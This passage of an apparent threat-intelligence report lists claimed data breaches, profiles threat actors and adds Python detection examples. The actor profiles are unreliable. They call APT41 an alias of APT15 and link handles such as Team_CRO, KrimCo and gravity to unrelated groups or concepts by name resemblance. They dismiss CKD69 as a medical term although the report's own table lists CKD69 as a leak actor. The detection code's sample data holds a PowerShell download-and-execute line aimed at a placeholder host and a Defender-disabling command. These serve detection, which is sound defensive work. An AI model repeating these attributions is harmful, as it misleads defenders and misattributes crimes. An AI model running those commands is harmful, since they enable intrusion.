22 | 2025-07-04T04:21:08Z | Telefónica Argentina (Network & Telecommunications), Argentina | Data Breach | injectioninferno | 1,200,025 records. |
23 | 2025-07-04T04:19:22Z | FGTS (Government & Public Sector), Brazil | Data Breach | injectioninferno | 1.5 Million lines of data. |
24 | 2025-07-04T04:15:12Z | OpenSSH (Unspecified Industry) | Vulnerability | l33tfg | Zero-day buffer overflow vulnerability in OpenSSH_10.0p2. |
25 | 2025-07-04T04:14:43Z | Lenovo (Information Technology (IT) Services) | Vulnerability | xrahitel | AppLocker bypass via writable C:\Windows\MFGSTAT.zip file with improper permissions. |
26 | 2025-07-04T04:00:54Z | UK Car Insurance Members (Insurance), UK | Data Leak | DigitalGhost | 150K records (names, emails, phones, postcodes, loan application statuses). |
27 | 2025-07-04T04:00:13Z | BPJS Kesehatan (Government & Public Sector), Indonesia | Data Breach | MR4cX | Full names, addresses, and BPJS identification numbers. |
28 | 2025-07-04T03:57:36Z | Claro (Network & Telecommunications), Argentina | Data Breach | injectioninferno | Over 1.1 million lines of data. |
29 | 2025-07-04T03:45:19Z | Russian Federation on the Sale of State and Municipal Property (Government Administration), Russia | Data Breach | DigitalGhost | 500K data leaked. |
30 | 2025-07-04T02:38:08Z | Caisse Primaire d’Assurance Maladie (Government Administration), France | Data Breach | zdclub | Over 300,000 unique and unused records (names, DOB, addresses, phones, national ID, PII). |
31 | 2025-07-04T02:32:08Z | Amextransport (Unspecified Industry), India | Defacement | Liwaa Muhammad | Website defacement. |
32 | 2025-07-04T01:46:07Z | UAE (Unspecified Industry), UAE | Data Leak | CKD69 | Passports, ID cards, phone numbers, info related to UAE government websites and major companies. |
33 | 2025-07-04T00:53:26Z | Unspecified (Unspecified Industry), USA | Data Leak | esgod | 3,500 U.S. credit cards (expiry, CVV, cardholder name, address, phone, email, PII). |
34 | 2025-07-04T00:48:40Z | STAR Insurance (Insurance), Tunisia | Data Leak | mecrobyte | Internal documents. |
35 | 2025-07-04T00:28:27Z | Unspecified (Unspecified Industry), USA | Data Leak | USDeez | 8M-record USA Business & Investor Database (company names, contact info, addresses, employee sizes, sales volumes, SIC codes, business descriptions). |
36 | 2025-07-04T00:05:23Z | Indian Journal of Practical Pediatrics (Healthcare & Pharmaceuticals), India | Data Breach | RXY | PII of medical professionals (names, designations, registration numbers, addresses, mobile numbers, email IDs). |
3. Featured Threat Actor Profiles
This section provides in-depth profiles of the threat actors identified in the incidents, drawing from the provided intelligence to offer comprehensive context on their motivations, tactics, techniques, and procedures (TTPs), and historical activities.
3.1. LIUSHEN (Aliases: APT15, UNC5174, PurpleHaze)
LIUSHEN is identified as a China-nexus threat actor, with some of its attack clusters, such as PurpleHaze, overlapping with known Chinese cyber espionage groups like APT15 and UNC5174.1 Further intelligence indicates that APT41, an alias for APT15, is believed to operate from Chengdu, China, with alleged ties to China’s Ministry of State Security.2
The primary motivation behind LIUSHEN’s activities is state-sponsored espionage, specifically focusing on the theft of intellectual property that aligns with China’s strategic five-year plans. However, this group also engages in financially motivated cybercriminal operations, including digital extortion, and has notably targeted the video game industry and virtual currency entities, often deploying ransomware.2 This dual operational capability, encompassing both intelligence gathering and financial crime, complicates attribution efforts. A ransomware attack, for instance, might appear to be purely criminal, yet it could be state-backed, providing both funding and a layer of plausible deniability. This blurring of traditional distinctions between nation-state and cybercrime operations presents a significant challenge for defenders in accurately categorizing threats and allocating resources effectively.
In terms of TTPs, LIUSHEN leverages operational relay box (ORB) network infrastructure, which is assessed to be operated from China. The group exploits vulnerabilities such as CVE-2024-8963 and CVE-2024-8190 to establish an initial foothold, sometimes even before these vulnerabilities are publicly disclosed. Following a successful compromise, access to the affected systems is often suspected of being transferred to other threat actors.1 LIUSHEN has targeted over 70 organizations across diverse sectors, including manufacturing, government, finance, telecommunications, and research. An IT services and logistics company responsible for managing hardware logistics for SentinelOne employees was among their victims in early 2025.1
3.2. KrimCo (Aliases: Sodinokibi, REvil, Gold Southfield, UNKN, Unknown, White Ursia)
KrimCo is strongly associated with the Sodinokibi/REvil ransomware operations, with some research suggesting connections to the GandCrab ransomware group.3 The group’s primary motivation is financial gain, operating under a Ransomware-as-a-Service (RaaS) business model. This model allows the core developers to profit from ransomware operations without directly conducting the attacks, thereby increasing their reach and providing a layer of deniability. KrimCo employs double extortion tactics, threatening to publish stolen data if the ransom demand is not met.3
A notable TTP of KrimCo is its practice of aborting ransomware attacks if certain languages, predominantly Russian, CIS (Commonwealth of Independent States), and Syrian Arabic, are detected on the victim’s system. This geographical exclusion suggests an implicit understanding or directive to avoid targeting entities within specific geopolitical regions, potentially to evade domestic law enforcement or align with broader state interests. This practice demonstrates that even purely financially motivated groups can have geopolitical considerations influencing their operations.3 KrimCo has a history of publicly naming victims and releasing stolen information on their leak sites, such as the “Happy Blog,” as observed with Artech Information Systems in January 2020.3
3.3. TH3 EL1T3 GHOST (Alias: Ghost Squad Hackers – GSH)
TH3 EL1T3 GHOST, also known as Ghost Squad Hackers (GSH), is a hacktivist group that operates as part of the broader Anonymous collective. The group is reportedly led by a figure known as “s1ege”.4 Their motivations are primarily political and ideological, with actions often driven by responses to perceived injustices, racism, or as protests against specific governments or organizations.4
GSH’s TTPs include Distributed Denial of Service (DDoS) attacks, website defacements, and data leaks. They coordinate their operations and amplify the impact of their activities through social media platforms.4 This group has demonstrated a wide-ranging targeting strategy, affecting diverse sectors and entities. Notable historical activities include targeting central banks as part of “Operation Icarus,” media outlets like Fox News and CNN during “OpSilence,” and the United States Armed Forces, resulting in the leakage of military personnel files. They have also targeted the government of Israel, leaking Israeli Defense Force (IDF) data, and have launched attacks against Donald Trump’s official websites, the Ku Klux Klan, and even Black Lives Matter.4 This demonstrates that hacktivist groups, while sometimes perceived as less sophisticated than nation-states, can cause significant disruption and reputational damage across a wide array of sectors, driven by diverse and often rapidly shifting ideological agendas. Their willingness to target both state and non-state entities, and even social movements they disagree with, highlights the unpredictable nature of hacktivism.
3.4. Pryx (Aliases: HolyPryx, Sp1d3r)
Pryx is an active malware and ransomware developer and an identity access broker, operating across various cybercrime platforms including XSS, BreachForums, Dread, Telegram, and X (formerly Twitter). Pryx claims to be 17 years old and is associated with prominent threat actors such as IntelBroker and members of the “Five Families” hacking alliance.5 Pryx leads the Hellcat ransomware group, which is also known as Morpheus ransomware.
Pryx’s motivations are a mix of financial opportunity and political objectives. The actor is known for being strongly anti-Israel and has stated that their primary focus is the government sector, driven by political motives.5 Pryx also seeks to establish a reputation as a notorious and reputable threat actor within the cybercrime community.5 This combination of advanced technical skill, entrepreneurial drive (forming Hellcat), and clear geopolitical motivation in a young actor signifies an evolving threat landscape where personal ideologies increasingly drive sophisticated cybercrime operations, blurring the lines between traditional criminal and state-sponsored activities.
In terms of TTPs, Pryx develops novel malware, including a “server-side stealer” that establishes a secret Tor service directly on compromised machines to host stolen data, thereby reducing the risk of detection during data exfiltration.5 The Hellcat group employs double-extortion tactics, stealing sensitive data before encrypting it.5 Rey, a co-leader of Hellcat, has been observed exploiting Jira credentials to gain access to sensitive data in various companies.6 Hellcat ransomware has claimed victims such as Schneider Electric, Telefónica, and Orange Romania, indicating Pryx’s escalation from solo attacks to targeting government systems and private companies.6
3.5. Team_CRO (Alias: Hacking Team)
Team_CRO refers to Hacking Team, a Milan-based information technology company founded in 2003. This company specialized in selling offensive intrusion and surveillance capabilities, often referred to as “lawful intercept” tools, to governments, law enforcement agencies, and corporations. In 2019, Hacking Team was acquired by InTheCyber Group and rebranded as Memento Labs.7
The company’s motivation was commercial profit, generating over 40 million Euros in revenue from its clientele.7 Their Remote Control Systems (RCS), including platforms like Da Vinci and Galileo, offered extensive surveillance capabilities. These tools enabled covert collection of emails, text messages, phone call history, and address books, as well as keystroke logging, screen capture, audio/video recording (including Skype calls), remote activation of microphones and cameras, GPS monitoring, UEFI BIOS rootkit infection, and exfiltration of cryptocurrency wallet files. These tools were designed with advanced techniques to avoid detection and minimize battery drain on target devices.7
Hacking Team’s clientele included 70 active customers, predominantly military, police, federal, and provincial governments, alongside corporate clients such as Barclays, British Telecom, and Deutsche Bank.7 A critical controversy arose when their software was reportedly used by corrupt Mexican officials to target and intimidate Mexican journalists on behalf of drug cartels.7 This demonstrates the inherent danger of dual-use technologies, where tools developed for “lawful” purposes can be diverted and misused by illicit actors. Furthermore, Hacking Team suffered a major data breach in 2015, which resulted in the public leakage of over 400 gigabytes of internal data, emails, and source code.7 This breach further exacerbated the risk by potentially putting advanced surveillance capabilities into the hands of a wider array of malicious entities, effectively democratizing sophisticated cyber tools and highlighting broader implications for national security and human rights.
3.6. Storm-0539 (Alias: Atlas Lion)
Storm-0539, also known as Atlas Lion, operates out of Morocco.8 This group is primarily financially motivated, with a focus on gift card fraud and payment card heists. Their objective is to steal gift cards and monetize them by selling them online at discounted rates, with observed thefts reaching up to $100,000 per day at certain companies.8
Active since late 2021, Storm-0539 increases its attack activity ahead of major holiday seasons. Between March and May 2024, Microsoft observed a 30% increase in their intrusion activity.8 Their TTPs are sophisticated, involving extensive social engineering tactics such as phishing and smishing. They register their own devices to victim environments to gain persistent access and bypass multi-factor authentication (MFA) prompts by redirecting them to the attacker’s device. They also use the access they gain to target third-party organizations. The group operates from free trials, pay-as-you-go subscriptions, and compromised cloud resources, even impersonating legitimate nonprofits to obtain sponsorship from cloud providers.8 The reconnaissance and cloud-environment abuse techniques employed by Storm-0539 resemble those observed from nation-state-sponsored threat actors.8 This demonstrates a professionalization of cybercrime, where financially driven groups adopt advanced techniques typically associated with state actors, requiring organizations to prepare for sophisticated attacks from a broader range of adversaries.
3.7. Handala Hack Group
The Handala Hack Group is a pro-Palestinian hacktivist collective that derives its name and symbol from Handala, a character created by Palestinian political cartoonist Naji al-Ali.9 This group is linked to Iran’s Ministry of Intelligence (MOIS) and is reportedly operated by a cyber unit within their internal security department, primarily for advertising purposes.10
The group’s motivations are primarily geopolitical, centered on the Israeli-Palestinian conflict and aiming to inflict “the pain of the Palestinians”.9 This consistent linking of Handala Hack to Iran’s MOIS elevates this group beyond typical hacktivism. Their targeting of critical infrastructure, as well as their willingness to engage in highly disruptive and psychologically impactful attacks, demonstrates a strategic intent.
Handala Hack employs sophisticated cyber-attacks, including phishing campaigns (sometimes disguised as F5 security updates), ransomware (utilizing double extortion), website defacements, and the disruption of public address systems.9 They are known to use wipers such as Hamsa Wiper and Hatef Wiper.11 The group frequently releases partial evidence of their successes and uses platforms like Telegram and Twitter for propaganda and real-time reporting of their activities.9 Notable targets include Israeli cybersecurity, critical infrastructure, and citizens. They claimed responsibility for attacks on kindergartens, disrupting public address systems to broadcast pro-terrorism songs and red alert warnings.10 They also claimed to have successfully hacked DRS RADA, a multi-purpose tactical radars company, and the Ma’agan Michael Kibbutz, from which they exfiltrated 22GB of data and sent over 5,000 warning SMS messages.9 Additionally, Handala claimed responsibility for a significant cyber-attack against Zerto, a Hewlett Packard Enterprise (HPE) subsidiary, alleging the exfiltration and subsequent deletion of a massive 51 terabytes (TB) of data.9 The group also claimed to have breached the Soreq Nuclear Research Center, alleging the theft of 197GB of data and publishing photos purportedly taken inside the facility.10 These actions, including claims of destructive data deletion and the use of wipers, indicate a move towards destructive capabilities rather than just data theft or defacement. This reveals a dangerous trend where state-sponsored entities leverage hacktivist fronts to conduct aggressive cyber operations, blurring lines and potentially escalating conflicts.
3.8. Ghost Ransomware Group (Aliases: Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, Rapture)
The Ghost ransomware group originates from China.12 Its primary motivation is financial gain.14 Active since 2021, this group is characterized by its “hack before we patch” strategy, exploiting well-known vulnerabilities in outdated software and firmware on internet-facing services.12
Ghost actors obtain initial access to networks by exploiting public-facing applications associated with multiple CVEs, including vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), Adobe ColdFusion servers (CVE-2010-2861, CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).12 A key operational characteristic is their extensive use of legitimate cybersecurity tools such as Cobalt Strike for access, privilege escalation, and command and control (C2) operations. They upload web shells and use Windows Command Prompt or PowerShell to download and execute Cobalt Strike Beacon malware. For credential access, they leverage Cobalt Strike functions like “hashdump” or Mimikatz, and for privilege escalation, they impersonate the SYSTEM user to run Beacon with elevated privileges. They also disable antivirus software, such as Windows Defender, on network-connected devices.12 This reliance on readily available, legitimate tools makes their activities harder to detect by traditional signature-based defenses. This group thrives on organizational patching delays and leverages common tools, making them a pervasive threat across all sectors, emphasizing the critical need for robust patch management and behavioral detection. Ghost actors typically spend only a few days on victim networks, often proceeding from initial compromise to ransomware deployment within the same day. They rotate ransomware executable payloads, encrypted file extensions, and ransom note text, which has historically led to variable attribution.12 The group has compromised organizations in over 70 countries, including critical infrastructure, healthcare, schools, universities, government networks, religious institutions, technology, manufacturing companies, and small- and medium-sized businesses.12
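The chain just described (web shell, PowerShell download of a Beacon, Defender switched off, all on the same day) is easier to catch as a sequence than as single alerts. The following Python is an added example, not code from the report or from any vendor: it classifies constructed process-creation records against those three stages and escalates a host when two different stages land inside a short window. The field names and every record are assumptions made for illustration.

```python
"""Added detection example for the Ghost ransomware chain described above:
web-server process spawning a shell (web shell), PowerShell download cradle
(Beacon staging) and Defender being switched off.  The telemetry schema and
every record below are constructed for illustration, not taken from an incident."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Parent processes that should never spawn an interactive shell on a web host.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download-and-execute idioms used to stage a payload.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|start-bitstransfer|-encodedcommand",
    re.I)
# Set-MpPreference with any -Disable* switch set to true (Defender tampering).
DEFENDER_TAMPER = re.compile(r"set-mppreference.*-disable\w*\s+\$?true", re.I)

# Constructed telemetry: simplified process-creation records (hypothetical schema).
SAMPLE_EVENTS = [
    {"ts": "2025-07-04T10:02:11Z", "host": "EXCH01", "parent": "w3wp.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2025-07-04T10:05:40Z", "host": "EXCH01", "parent": "cmd.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.5/a')"},
    {"ts": "2025-07-04T10:09:03Z", "host": "EXCH01", "parent": "powershell.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    # Benign noise on other hosts: a scheduled script and an admin re-enabling AV.
    {"ts": "2025-07-04T11:30:00Z", "host": "FS02", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ts": "2025-07-04T11:45:00Z", "host": "WS03", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"},
]


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def classify_event(ev: dict):
    """Return the kill-chain stage one process-creation record matches, or None."""
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
    if parent in WEB_SERVER_PARENTS and image in SHELLS:
        return "webshell_spawn"
    if image in POWERSHELL and DEFENDER_TAMPER.search(cmd):
        return "defender_tamper"
    if image in POWERSHELL and DOWNLOAD_CRADLE.search(cmd):
        return "download_cradle"
    return None


def correlate(events, window=timedelta(hours=1)):
    """Group stage hits per host.  Two different stages on one host within
    `window` is escalated to critical: the report notes Ghost goes from
    foothold to encryption within a day, so single-stage alerts queue too slowly."""
    hits = defaultdict(list)
    for ev in events:
        stage = classify_event(ev)
        if stage:
            hits[ev["host"]].append((parse_ts(ev["ts"]), stage))
    alerts = {}
    for host, seq in hits.items():
        seq.sort()
        severity = "medium"
        for i, (t1, s1) in enumerate(seq):
            if any(s2 != s1 and t2 - t1 <= window for t2, s2 in seq[i + 1:]):
                severity = "critical"
                break
        alerts[host] = {
            "severity": severity,
            "stages": sorted({s for _, s in seq}),
            "first_seen": seq[0][0].isoformat() + "Z",
        }
    return alerts


if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS).items():
        print(host, alert)
```

Only EXCH01 is raised, as critical, because three distinct stages fall inside one hour; the Defender re-enable on WS03 and the scheduled script on FS02 produce nothing.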
3.9. _Sentap
_Sentap operates on the predominantly Russian-speaking dark web forum xss.15 This actor is primarily financially motivated, seeking to profit from selling compromised data.15
_Sentap claims to have obtained “unprecedented” access to cloud infrastructure. Their TTPs include website cloning, bypassing Web Application Firewalls (WAF), and crypto draining.15 A recent notable activity involved advertising the sale of 1.02 terabytes of U.S. property data, allegedly obtained from a U.S.-based title company specializing in property record search services. This data reportedly includes highly sensitive personally identifiable information (PII) such as names, addresses, dates of birth, Social Security numbers, phone numbers, email addresses, mortgage details, and property ownership information. The data spans “strategic” regions including Illinois, Indiana, Wisconsin, Minnesota, Iowa, Colorado, and Kansas, and dates from the 1990s to 2025.15 This signifies a trend where financially motivated actors are expanding their targets beyond typical corporate or financial databases to include specialized, high-value datasets like property records. This data can be used for various forms of fraud, identity theft, or targeted social engineering, indicating a more sophisticated and diversified approach to the monetization of stolen information.
3.10. Scattered Spider
Scattered Spider is a threat actor known for its sophisticated social engineering capabilities.16 The group’s motivations are financial gain, leading to data theft, extortion, and ransomware deployment.16
This group relies heavily on social engineering as a primary initial access vector. They frequently impersonate employees or contractors to deceive IT help desks into granting them access. They also target third-party IT providers to gain entry into larger organizations. Scattered Spider is known for its rapid double-extortion capabilities, demonstrating the ability to breach systems, establish persistence, harvest sensitive data, disable recovery mechanisms, and detonate ransomware across both on-premises and cloud environments within a matter of hours.16 The group conducts extensive reconnaissance to identify and single out high-value individuals, such as Chief Financial Officers (CFOs), and then persuades IT help desk personnel to reset the multi-factor authentication (MFA) devices and credentials tied to these high-value accounts.16 This highlights a critical shift where even technically sophisticated ransomware operations prioritize human manipulation (social engineering) as their primary initial access vector, rather than solely relying on technical exploits. The ability to bypass MFA through help desk manipulation demonstrates a significant vulnerability in organizational identity verification processes, making human vigilance and robust verification protocols paramount. Scattered Spider has been observed conducting attacks against the aviation industry and recently breached an unnamed organization by specifically targeting its CFO.16
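The help-desk MFA reset on a high-value account described here for Scattered Spider and the attacker device registration described for Storm-0539 in section 3.6 can be surfaced from the same identity audit stream. The Python below is an added example, not from the report or any identity vendor; the event schema, the `HIGH_VALUE_ACCOUNTS` list and all records are constructed for illustration. It learns each user's usual sign-in countries as it goes and judges resets and registrations against that history.

```python
"""Added example: anomaly checks over an identity audit stream for two TTPs in
this report, the help-desk MFA reset on a high-value account (Scattered Spider)
and attacker device registration to satisfy MFA (Storm-0539).  Event schema,
account names and records are constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed: accounts the business has designated as high value (e.g. the CFO).
HIGH_VALUE_ACCOUNTS = {"cfo@example.com", "controller@example.com"}

# Constructed audit records in a hypothetical schema.
SAMPLE_EVENTS = [
    {"type": "signin", "ts": "2025-06-10T08:00:00Z", "user": "cfo@example.com",
     "country": "US", "device_id": "dev-cfo-laptop"},
    {"type": "signin", "ts": "2025-06-25T08:10:00Z", "user": "cfo@example.com",
     "country": "US", "device_id": "dev-cfo-laptop"},
    # Help desk resets the CFO's MFA after a phone call claiming a lost phone.
    {"type": "mfa_reset", "ts": "2025-07-04T09:15:00Z", "user": "cfo@example.com",
     "actor": "helpdesk-02"},
    # Minutes later a new device is registered from a country never seen for the user.
    {"type": "device_registered", "ts": "2025-07-04T09:40:00Z",
     "user": "cfo@example.com", "country": "NL", "device_id": "dev-unknown-77"},
    {"type": "signin", "ts": "2025-07-04T09:45:00Z", "user": "cfo@example.com",
     "country": "NL", "device_id": "dev-unknown-77"},
    # Benign: a regular user enrols a phone from their usual country, no reset involved.
    {"type": "signin", "ts": "2025-06-20T09:00:00Z", "user": "alice@example.com",
     "country": "US", "device_id": "dev-alice"},
    {"type": "device_registered", "ts": "2025-07-04T10:00:00Z",
     "user": "alice@example.com", "country": "US", "device_id": "dev-alice-phone"},
]


@dataclass
class Finding:
    user: str
    ts: datetime
    severity: str
    reason: str


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def analyze(events, window=timedelta(hours=2)):
    """Walk events in time order, learning each user's usual countries from
    sign-ins and judging resets and device registrations against the history
    as it existed at that moment."""
    seen_countries = defaultdict(set)
    resets = defaultdict(list)          # user -> timestamps of help-desk resets
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, user = parse_ts(ev["ts"]), ev["user"]
        if ev["type"] in ("mfa_reset", "credential_reset"):
            resets[user].append(ts)
            if user in HIGH_VALUE_ACCOUNTS:
                findings.append(Finding(user, ts, "high",
                    f"{ev['type']} by {ev['actor']} on high-value account; "
                    "confirm by out-of-band callback to a number already on file"))
        elif ev["type"] == "device_registered":
            new_country = ev["country"] not in seen_countries[user]
            after_reset = any(ts - r <= window for r in resets[user])
            if new_country or after_reset:
                severity = ("critical" if new_country and after_reset
                            else "high" if after_reset else "medium")
                findings.append(Finding(user, ts, severity,
                    f"device {ev['device_id']} registered from {ev['country']}"
                    + (" (country never seen for this user)" if new_country else "")
                    + (" shortly after an MFA/credential reset" if after_reset else "")))
            # Deliberately not added to the baseline: a registration must not
            # whitelist the device or country it came from.
        elif ev["type"] == "signin":
            if seen_countries[user] and ev["country"] not in seen_countries[user]:
                findings.append(Finding(user, ts, "medium",
                    f"sign-in from {ev['country']}, outside the user's baseline"))
            seen_countries[user].add(ev["country"])
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.ts.isoformat(), f.user, f.severity, f.reason)
```

The CFO account yields three findings in sequence (the reset itself, the registration rated critical because it is both post-reset and from an unseen country, then the sign-in from the new country), while the ordinary enrolment produces none.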
3.11. Lazarus Group (Aliases: APT38)
The Lazarus Group, also known as APT38, consists of cyber actors from the Democratic People’s Republic of Korea (DPRK).17 Their primary motivation is state-sponsored revenue generation, likely aimed at circumventing international sanctions and funding the regime.17 This demonstrates a clear and sustained strategy by a nation-state to use cybercrime, specifically cryptocurrency theft, as a primary means of funding its operations. This is a significant geopolitical threat, as it means cyberattacks are not just for espionage or disruption, but directly contribute to state finances, impacting global financial security.
The Lazarus Group conducts high-profile international virtual currency heists. Their TTPs involve moving stolen funds across various virtual currency networks, including Ethereum, Binance Smart Chain (BSC), and Polygon, to specific virtual currency addresses.17 In 2023 alone, DPRK cyber actors were responsible for stealing over $200 million in virtual currency. Specific incidents attributed to the Lazarus Group include approximately $41 million from Stake.com in September 2023, $60 million from Alphapo and CoinsPaid in July 2023, and $100 million from Atomic Wallet in June 2023. They were also confirmed responsible for the theft of $100 million from Harmony’s Horizon bridge in June 2022, and attacks against Sky Mavis’ Ronin Bridge.17
3.12. Bl00dy / Clop / LockBit Ransomware Operations (Aliases: Lace Tempest, FIN11, TA505)
These ransomware operations, including Bl00dy, Clop, and LockBit, are often observed exploiting the same vulnerabilities. Microsoft attributes these related campaigns to Lace Tempest, which correlates with the FIN11 and TA505 threat actor groups.19 Their motivation is financial gain, achieved through ransomware deployment and data exfiltration for extortion.19
These groups actively exploit critical server vulnerabilities, such as those found in PaperCut MF/NG (CVE-2023-27350 and CVE-2023-27351). These vulnerabilities allow for unauthenticated remote code execution and the retrieval of user data, including hashed passwords for internal users.19 The exploitation of these flaws enables the deployment of ransomware to encrypt and exfiltrate data from target systems. These groups are known for rapidly operationalizing newly disclosed vulnerabilities, as evidenced by their exploitation of zero-day vulnerabilities in the GoAnywhere MFT platform.19 The fact that multiple, distinct ransomware groups are quickly leveraging the same critical vulnerabilities shortly after disclosure indicates that the window for organizations to patch critical vulnerabilities before active exploitation is extremely narrow, underscoring the urgency of vulnerability management. The education sector has been a notable target for the Bl00dy ransomware gang.19
3.13. GhostSec (Aliases: GhostSecMafia, GSM)
GhostSec, also known by aliases like GhostSecMafia and GSM, is described as a highly organized hacktivist group with reported ties to members of the “Anonymous” hacktivist collective.20 While specific political motivations are not detailed in the provided information, their classification as hacktivists implies an ideological drive.20
A distinctive TTP of GhostSec is its operation of a subscription-based premium channel on Telegram. Through this channel, the group shares exclusive content, including leaks and tutorials, with its subscribers.20 This suggests a move towards monetizing their activities or knowledge. The group is highly organized, reportedly comprising approximately 16 active members, each assigned specific roles such as gaining initial access, privilege escalation, or lateral movement. They also provide mutual support to members who face police investigations, indicating a high level of cooperation and internal structure.20 This level of internal structure and monetization is unusual for traditional, loosely affiliated hacktivist groups, suggesting a professionalization of hacktivism where groups adopt more structured operations and even financial models, potentially increasing their sustainability and impact beyond spontaneous, ad-hoc attacks.
3.14. Z-PENTEST ALLIANCE
The Z-PENTEST ALLIANCE first emerged in October 2023, with a probable origin in Serbia, maintaining close ties to pro-Russian actors. The group frequently collaborates with other entities such as SECTOR16, OverFlame, and People’s Cyber Army (PCA) to coordinate attacks and share resources.21
The group’s motivations are primarily geopolitical. Their attacks aim to weaken industrial control systems (ICS/SCADA) in Western countries by exploiting technological vulnerabilities, thereby strengthening Russia’s geopolitical influence. They also seek to undermine Western solidarity and create divisions within NATO.21 This strategic focus on critical infrastructure for geopolitical ends demonstrates a direct intent for disruptive and potentially destructive cyber warfare against essential services.
Z-PENTEST ALLIANCE is distinguished by its ability to penetrate operational technology (OT) systems in critical infrastructure. Their TTPs include developing specialized tools to penetrate OT systems, exploiting vulnerabilities in ICS/SCADA, and leveraging zero-day vulnerabilities, often acquired from the dark web or through collaboration with other groups. They employ social engineering techniques to obtain sensitive information or system access and utilize information from data leaks to prepare and execute larger, more targeted attacks. The group coordinates its attacks on Telegram and private forums, and uses X (formerly Twitter) for propaganda and to amplify the impact of their operations. They also release videos showcasing their access to critical systems to instill fear and uncertainty in their victims.22 The group mainly targets the energy (oil and gas) and water sectors, aiming to disrupt critical functions such as water pumping and the management of gas and oil distribution.22 The use of zero-day vulnerabilities and collaboration with other pro-Russian groups further indicates a sophisticated, coordinated, and state-aligned effort to achieve strategic geopolitical objectives through cyber means. This represents a significant escalation in cyber conflict, moving beyond data theft to direct operational disruption.
3.15. Disambiguation of Non-Threat Actors / Misnomers
Several terms in the query do not refer to specific malicious threat actors but rather to broader concepts, legitimate entities, or fictional elements. Clarifying these distinctions is crucial for accurate threat intelligence.
- CrakX_Combo: This term describes the challenge of inconsistent threat actor naming conventions across the cybersecurity industry. Microsoft and CrowdStrike are actively collaborating to align their individual threat actor taxonomies, publishing a new joint mapping to reduce confusion and improve intelligence sharing. Examples include Microsoft’s Midnight Blizzard (formerly Nobelium) also being known as APT29, BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, and The Dukes.23 This highlights a meta-challenge within threat intelligence itself.
- Dimitry_S: The intelligence refers to two distinct, prominent cybersecurity experts: Dmitry Bestuzhev, Senior Director of Cyber Threat Intelligence at BlackBerry, known for his research on financially motivated targeted attacks 24, and Dmitry Volkov, CEO of Group-IB, a cybersecurity veteran involved in cyber investigations and identifying notorious threat actors like Cobalt, Silence, MoneyTaker, and Lazarus.25 Neither individual is a malicious threat actor.
- gravity: This term refers to the concept of “Center of Gravity (COG)” analysis, a strategic framework used in military and hybrid threat contexts for understanding adversaries.26 It is a theoretical concept for strategic analysis, not a specific malicious entity involved in cyber breaches.
- Leonsky / Darkfirefox / MR4cX / zdclub / l33tfg / C3FaRiR / injectioninferno: These names do not correspond to any identified threat actors or their aliases within the provided intelligence. The associated intelligence snippets discuss other, distinct threat actors or general cybersecurity concepts.27 Their presence in the query may be a placeholder, misspelling, or reference to entities not covered by the available intelligence.
- MartinL: This term likely refers to Lockheed Martin, a prominent defense contractor recognized for developing the Cyber Kill Chain framework, a critical model for identifying and preventing cyber intrusions.32 The provided intelligence discusses general threat actor types and Lockheed Martin’s contributions to cybersecurity 32, not a malicious actor named “MartinL.”
- whiterose: This is a fictional character from the TV series “Mr. Robot,” portrayed as a cyber-terrorist and leader of the “Dark Army”.41 This is a fictional entity, and its inclusion underscores the potential for confusion between real and fictional cyber threats.
- CKD69: This appears to be a medical reference (Chronic Kidney Disease) and has no relevance to cybersecurity or threat actors in the provided intelligence. Its presence in the research material is likely an artifact or a misdirection.
Table 2: Threat Actor Quick Reference
This table offers a concise summary of each researched threat actor, facilitating easy comparison and understanding of their characteristics, motivations, and common TTPs. It serves as a rapid lookup for key actor intelligence.
Threat Actor Name | Known Aliases | Primary Motivation | Key TTPs | Notable Targets |
LIUSHEN | APT15, UNC5174, PurpleHaze | State-sponsored espionage, digital extortion | ORB network, CVE exploitation, access transfer | Manufacturing, government, finance, telecommunications, research, IT services |
KrimCo | Sodinokibi, REvil, Gold Southfield, UNKN, Unknown, White Ursia | Financial gain (RaaS) | Double extortion, RaaS model, language-based attack abortion | Artech Information Systems, various organizations (data leaks) |
TH3 EL1T3 GHOST | Ghost Squad Hackers (GSH) | Political/Ideological (hacktivism) | DDoS, defacement, data leaks | Central banks, Fox News, CNN, US Armed Forces, Israeli gov, Donald Trump, KKK, BLM |
Pryx | HolyPryx, Sp1d3r (Hellcat group) | Financial gain, political (anti-Israel) | Server-side stealers (Tor-based), double extortion, Jira credential exploitation | Schneider Electric, Telefónica, Orange Romania, government systems |
Team_CRO | Hacking Team | Commercial profit (selling surveillance tools) | RCS tools (covert data collection, keystroke logging, camera/mic activation, GPS, rootkits, crypto exfil) | Governments, law enforcement, corporations (Barclays, BT, Deutsche Bank), Mexican drug cartels |
